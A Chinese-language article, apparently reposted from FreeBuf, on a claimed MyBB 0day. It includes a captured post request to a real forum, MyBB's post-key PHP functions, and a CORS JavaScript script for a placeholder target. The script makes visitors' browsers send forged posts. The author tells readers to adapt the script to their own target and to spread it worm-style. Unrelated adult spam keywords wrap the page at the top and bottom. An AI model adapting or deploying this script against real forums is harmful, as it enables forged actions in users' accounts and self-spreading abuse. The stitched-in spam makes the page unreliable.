成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

知名論壇系統(tǒng)MyBB被爆0day漏洞

安全 漏洞
MyBB是國際上非常優(yōu)秀的免費(fèi)論壇軟件,最大的特色是簡單但是功能卻出奇的強(qiáng)大。支持多國語言,可以分別設(shè)置前臺后臺的語言,每個用戶都可以設(shè)置自己使用何種語言訪問論壇包括自己的時區(qū)等,自定義功能強(qiáng)大到?jīng)]有做不到只有想不到。

MyBB是國際上非常優(yōu)秀的免費(fèi)論壇軟件,最大的特色是簡單但是功能卻出奇的強(qiáng)大。支持多國語言,可以分別設(shè)置前臺后臺的語言,每個用戶都可以設(shè)置自己使用何種語言訪問論壇包括自己的時區(qū)等,自定義功能強(qiáng)大到?jīng)]有做不到只有想不到。

[[147404]]

漏洞影響多個版本

本次影響版本:1.6x & 1.8x

測試版本:1.8.3 (最新), 以及1.6.16 (1.6系列最新)

正是因為其強(qiáng)大影響力,我便開始肆意玩耍MyBB以及監(jiān)控請求,在此期間我注意到一些極有可能導(dǎo)致漏洞出現(xiàn)的東西,這些都已經(jīng)在多個站點上進(jìn)行了測試。

測試過程

首先損壞MyBB很簡單。當(dāng)你去發(fā)布一個新的帖子,在提交時它會請求一些東西,以下為來自Hackforums論壇post請求的示例:

POST http://www.hackforums.net/newreply.php?tid=4602700&processed=1 HTTP/1.1
Host: www.hackforums.net
User-Agent: Mozilla/5.0 (Windows NT 5.3; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.hackforums.net/newreply.php?tid=4602700
Cookie: *
Connection: keep-alive
Content-Type: multipart/form-data; boundary=------71842462512788
Content-Length: 1588
------71842462512788
Content-Disposition: form-data; name="my_post_key"
******
------71842462512788
Content-Disposition: form-data; name="message_new"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="message"
Hey dude, I love your site Omni. Can I get a free upgrade?
------71842462512788
Content-Disposition: form-data; name="submit"
Post Reply
------71842462512788
Content-Disposition: form-data; name="action"
do_newreply
------71842462512788
Content-Disposition: form-data; name="replyto"
------71842462512788
Content-Disposition: form-data; name="posthash"
******
------71842462512788
Content-Disposition: form-data; name="attachmentaid"
------71842462512788
Content-Disposition: form-data; name="attachmentact"
------71842462512788
Content-Disposition: form-data; name="subject"
*
------71842462512788
Content-Disposition: form-data; name="quoted_ids"
------71842462512788
Content-Disposition: form-data; name="tid"
4602700
------71842462512788--

對于MyBB這個系統(tǒng)我們已經(jīng)了解它的一些字段了,其中第一個就是post key,如果沒有這個字段,我們就不能發(fā)送任何帖子。獲取這個key十分簡單,稍后我們會進(jìn)行詳細(xì)解釋。現(xiàn)在我們需要獲取的是posthash,posthash僅僅只是一個MD5字符串,只需創(chuàng)建一個有效的MD5字符串就可以繞過它。我可以告訴你這是因為占位符的原因,但是深究其內(nèi)在不是我們今天要討論的問題。

盯著message_new和message字段,MyBB會提交這兩個字段,然而它僅顯示message字段中的內(nèi)容,而不會顯示message_new字段中的內(nèi)容。所以你可以在之前的帖子message_new字段中寫入cocks,當(dāng)然你無法從帖子中看出與之前有什么不同。

如何生成post key

post key會依賴以下函數(shù):

function generate_post_check(){
    global $mybb, $session;
    if($mybb->user['uid'])
    {
        return md5($mybb->user['loginkey'].$mybb->user['salt'].$mybb->user['regdate']);
    }
    // Guests get a special string
    else
    {
        return md5($session->useragent.$mybb->config['database']['username'].$mybb->settings['internal']['encryption_key']);
    }}

接著驗證post key是否調(diào)用該函數(shù):

function verify_post_check($code, $silent=false){
    global $lang;
    if(generate_post_check() != $code)
    {
        if($silent == true)
        {
            return false;
        }
        else
        {
            if(defined("IN_ADMINCP"))
            {
                return false;
            }
            else
            {
                error($lang->invalid_post_code);
            }
        }
    }
    else
    {
        return true;
    }}

然后我們會看到它在查找loginkey, salt, regdate信息。現(xiàn)在我們獲取這些信息是相當(dāng)?shù)娜菀?我不想過多解釋,這個確實太容易了)一旦獲得post key,只要其是可用的并且用戶還未更改密碼(目前大多數(shù)論壇用戶很少有經(jīng)常修改密碼的習(xí)慣)。

好了,這就開始我們的攻擊。首先我們需要確定一個攻擊目標(biāo)(我在本機(jī)上搭建了一個站點),接著我寫了一個CORS腳本,然后用戶通過瀏覽器點擊一個用來請求帖子內(nèi)容的URL,URL在另一端獲取到請求后,進(jìn)行處理但是不會進(jìn)行消息提示。假設(shè)你構(gòu)造了一個合法的請求,你將會看到網(wǎng)頁的變化。

如何使用

基于不同的需求,可以構(gòu)造不同的請求。這可用于提交帖子,獲取論壇榮譽(yù)點等。如果你想把這個漏洞搞的像是蠕蟲病毒一般,只需每個訪問到帖子的人都在這個帖子下面繼續(xù)回復(fù)(這個需要把更多的精力放在獲取post key上),說實話這種可能非常高!

CORS代碼

注意:這只是來自appsec-labs的示例代碼,你需要進(jìn)行一些修改以適合你的攻擊目標(biāo):

// I suggest adding jQuery to top of file// You will have to modify the code to make it more useable as I won't be modifying it for you.var url = 'http://forum.mytarget.com/';
$(document).ready(function() {
     corsMyBBPost();});function corsMyBBPost(){
    for(i=0; i<times; i++)
    {
        cors_send("post", url + "?proof_of_concept=1&req_num=" + i, "post=data", false);
    }}function cors_send(method, url, data, credentials){
    var cors;
    if (window.XDomainRequest)
    {
        cors = new XDomainRequest();
        if (cors)
        {
            cors.onprogress = function() { CORSstatus("Process") };
            cors.onload = function() { CORSresult(cors.responseText) };
        }
        else
            CORSstatus("Browser does not support Cross Origin Request");
    }
    else if (window.XMLHttpRequest)
    {
        cors = new XMLHttpRequest();
        cors.onreadystatechange = function() {
            if (cors.readyState == 4)
                CORSresult(cors.getAllResponseHeaders(), cors.responseText);
            else
                CORSstatus("Process");
            }
    }
    else
    {
        CORSstatus("Browser does not support AJAX");
    }
    method = method.toUpperCase();
    if (method == "POST" || method == "PUT")
        cors.open(method, url, data);
    else
        cors.open(method, url);
    if (credentials)
        cors.withCredentials = "true";
    cors.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
    cors.send(data);
    CORSstatus("Cross Origin Resource Sharing - Start");}function CORSstatus(msg) {
     console.log(msg);}function CORSerror(msg) {
     console.log("Oh shit..." + msg);}

不加任何修飾,這代碼十分簡潔。在此我不會描述如何盜取post key的方法,如果你自己有何領(lǐng)悟那是你自己的事情。

最后,希望大家能夠從中多學(xué)多一些東西。

最重要的是:玩的開心便好!

責(zé)任編輯:藍(lán)雨淚 來源: FreeBuf
相關(guān)推薦

2013-05-24 14:02:42

2009-09-09 08:54:50

2009-07-06 13:15:07

2011-03-15 15:14:22

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2021-10-06 13:48:50

0day漏洞攻擊

2015-05-20 16:34:14

2021-04-17 15:14:24

微信0day漏洞

2024-10-17 16:25:20

2015-10-12 10:07:19

2021-04-15 19:48:38

0day漏洞Chrome

2011-08-26 11:44:01

2022-03-30 09:09:39

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2022-03-25 13:41:55

漏洞網(wǎng)絡(luò)攻擊Quantum(量子

2010-01-20 16:13:15

2020-12-17 10:28:27

漏洞網(wǎng)絡(luò)攻擊網(wǎng)絡(luò)安全

2021-07-14 17:17:45

0day漏洞惡意代碼

2011-02-28 09:34:55

2010-05-21 09:55:26

2010-07-22 10:13:34

點贊
收藏

51CTO技術(shù)棧公眾號

主站蜘蛛池模板: 97精品超碰一区二区三区 | 在线看亚洲 | 亚洲欧美bt| 国产黄色大片在线观看 | 日本午夜视频 | 国产精品视频在线播放 | 一区二区三区四区免费在线观看 | 日韩视频一区在线观看 | 欧美国产精品一区二区三区 | 91精品国产91久久久久久最新 | 国产精品一区二区久久 | 亚洲免费观看 | 国产不卡一区在线观看 | 亚洲黄色在线免费观看 | 成人不卡| 成人激情视频网 | 精品国产一区二区三区在线观看 | 成人欧美一区二区三区黑人孕妇 | 欧美精品久久久 | 亚洲精品在线视频 | 欧美久久不卡 | 精品国产一区二区在线 | 亚洲三区在线观看 | 中文字幕福利视频 | 国产精品久久久久一区二区三区 | 精品av天堂毛片久久久借种 | 欧美一级黄| 天天天天操 | 精品久久精品 | 欧美福利影院 | 91在线一区 | 国产精品久久久久久久久图文区 | 亚洲成人一区二区三区 | 色欧美片视频在线观看 | 久久精品国产一区 | 欧美精品一二三区 | 做a视频在线观看 | 日韩久久久久久 | 日本高清视频在线播放 | 国产日产欧产精品精品推荐蛮挑 | 欧美美女被c |